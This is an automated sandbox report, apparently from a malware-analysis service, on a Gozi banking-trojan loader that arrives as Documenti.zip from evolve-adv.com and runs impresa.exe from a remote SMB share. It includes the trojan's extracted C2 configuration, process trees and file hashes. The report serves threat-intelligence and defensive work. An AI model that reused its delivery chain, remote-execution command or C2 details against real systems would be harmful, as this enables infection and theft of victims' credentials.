Analysis
-
max time kernel
271s -
max time network
283s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-it -
resource tags
arch:x64arch:x86image:win10v2004-20230915-itlocale:it-itos:windows10-2004-x64systemwindows -
submitted
11-10-2023 00:30
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
gozi
Extracted
gozi
5050
45.93.139.24
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepid process 3300 msedge.exe 3300 msedge.exe 412 msedge.exe 412 msedge.exe 2348 identity_helper.exe 2348 identity_helper.exe 2388 msedge.exe 2388 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
7zG.exedescription pid process Token: SeRestorePrivilege 4132 7zG.exe Token: 35 4132 7zG.exe Token: SeSecurityPrivilege 4132 7zG.exe Token: SeSecurityPrivilege 4132 7zG.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
Processes:
msedge.exe7zG.exepid process 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 4132 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe 412 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 412 wrote to memory of 4920 412 msedge.exe msedge.exe PID 412 wrote to memory of 4920 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 2704 412 msedge.exe msedge.exe PID 412 wrote to memory of 3300 412 msedge.exe msedge.exe PID 412 wrote to memory of 3300 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe PID 412 wrote to memory of 2040 412 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa332546f8,0x7ffa33254708,0x7ffa332547181⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://evolve-adv.com/impresa/Documenti.zip1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=collections --mojo-platform-channel-handle=5724 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --service-sandbox-type=none --mojo-platform-channel-handle=6028 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9832876669032911678,4598642814083755953,131072 --lang=it --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Documenti\" -spe -an -ai#7zMap12235:80:7zEvent309281⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
\??\UNC\62.173.146.72\scarica\impresa.exe"\\62.173.146.72\scarica\impresa.exe"1⤵
-
\??\UNC\62.173.146.72\scarica\impresa.exe"\\62.173.146.72\scarica\impresa.exe"1⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54d25fc6e43a16159ebfd161f28e16ef7
SHA149941a4bc3ed1ef90c7bcf1a8f0731c6a68facb4
SHA256cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5
SHA512ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD55ee95f8a2bab47180420b70a0f23671e
SHA146092184749d3a449f33c3a8c105eab07144d295
SHA256ad403df4029ce2b29658e3c1458984bae1a45492477faeb63993ba26bf50643c
SHA51227fe100bd147e646db41177c803443248f8cb9bb71ec6158b0f7550097e408068045e93214bf4d5044c189aeea51a0558db3e2d27993aed40e1cd96ee55bded0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD579a11c530a25770b7540a258c531f1c0
SHA1bff976362d3de3331cc303613a13d358cf658027
SHA256e85a4d315548d0fefdba5dfbcfc076db3a0bafb63f9318fe05afc836353e3f5a
SHA512828eaa0007bad51ad26e3cbe507909fa942ce39f114d8de12a608fdc248b369986774a2ffaee939a418637cdb0457456224800ef8867e4cdf459f75179d34191
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD59760feeb2e2785701260e8a2b98c3aba
SHA18adae405dd683a617c567e70072141a31949e193
SHA256905e1a7a0317dd854d4a824462a758483824ab446a619d8fd9ea3b6c4d8a9595
SHA5128ee8e17943afdbf6a313c06db58377eb4538ae3ab664a8a21bd2078d208b1c43f26a48f44719eca55ffb4a9454df7c2ad85d424b21c8c6efee886fea6daea303
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD5d555d038867542dfb2fb0575a0d3174e
SHA11a5868d6df0b5de26cf3fc7310b628ce0a3726f0
SHA256044cac379dddf0c21b8e7ee4079d21c67e28795d14e678dbf3e35900f25a1e2e
SHA512d8220966fe6c3ae4499bc95ab3aead087a3dd915853320648849d2fc123a4acd157b7dba64af0108802522575a822651ecc005523c731423d9131ee679c2712f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5c297e90cb21c339ce2ec95f0346cd7ed
SHA16c4d7b47d51d387d71d4ec015244d464bd4060af
SHA256f0e95b6bec1fe2f80ace11eb9ca2ef71497418c12111069aab6fe2764da0719b
SHA512d948348c5cada1124c3b1f5967d6801cd5c70cb45d02274c93a22c129433554854b1c8ead7b054e8f33c5c02f8bc7580c9f547805a9487b0a4718de6d5b6a553
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD50bf7c36814280dec53ec4dda48b59bd0
SHA1d6d6e4cb0c3752afe96984aef805e014ad141692
SHA256c1cd2cc7a8fed7cf0257cbc40240c0941f52079b2425043083767ac411d0cd70
SHA512f77932e7a0b2fb2347ce33ee3ac08d9ad4d1e90d7d3c0386dd9b32dfa678aa0cf4e23b191a938f115c26f898897a4793e3418c7b642eb7244abb53c11e90db77
-
C:\Users\Admin\Downloads\Documenti.zipFilesize
326B
MD5902f6266e8e0b95c2801839ecd926a29
SHA1989ec5b1787b96a81f8535df4e0f8debcbdc8132
SHA256a43f7e57a2a6e00480baf95d1e9c82332796fbb4b4873046bd1ac9bca4f68075
SHA51299892a65bf036d927970a8cf3377d62681771052ae296c08f003f977f30883fdc14d9c8c0726d037f5e340d3fed2a7d918e2ee7545a66219e4569769709206e0
-
\??\pipe\LOCAL\crashpad_412_CMJHPWBCJNEQMYWEMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1248-222-0x0000000000400000-0x0000000002287000-memory.dmpFilesize
30.5MB
-
memory/1248-212-0x0000000002320000-0x000000000232B000-memory.dmpFilesize
44KB
-
memory/1248-213-0x0000000000400000-0x0000000002287000-memory.dmpFilesize
30.5MB
-
memory/1248-214-0x0000000002350000-0x0000000002450000-memory.dmpFilesize
1024KB
-
memory/1248-216-0x0000000003EC0000-0x0000000003ECD000-memory.dmpFilesize
52KB
-
memory/1248-225-0x0000000002350000-0x0000000002450000-memory.dmpFilesize
1024KB
-
memory/3196-211-0x0000000000400000-0x0000000002287000-memory.dmpFilesize
30.5MB
-
memory/3196-215-0x0000000000400000-0x0000000002287000-memory.dmpFilesize
30.5MB
-
memory/3196-217-0x0000000002450000-0x000000000245D000-memory.dmpFilesize
52KB
-
memory/3196-209-0x00000000024C0000-0x00000000025C0000-memory.dmpFilesize
1024KB
-
memory/3196-223-0x00000000024C0000-0x00000000025C0000-memory.dmpFilesize
1024KB
-
memory/3196-224-0x0000000000400000-0x0000000002287000-memory.dmpFilesize
30.5MB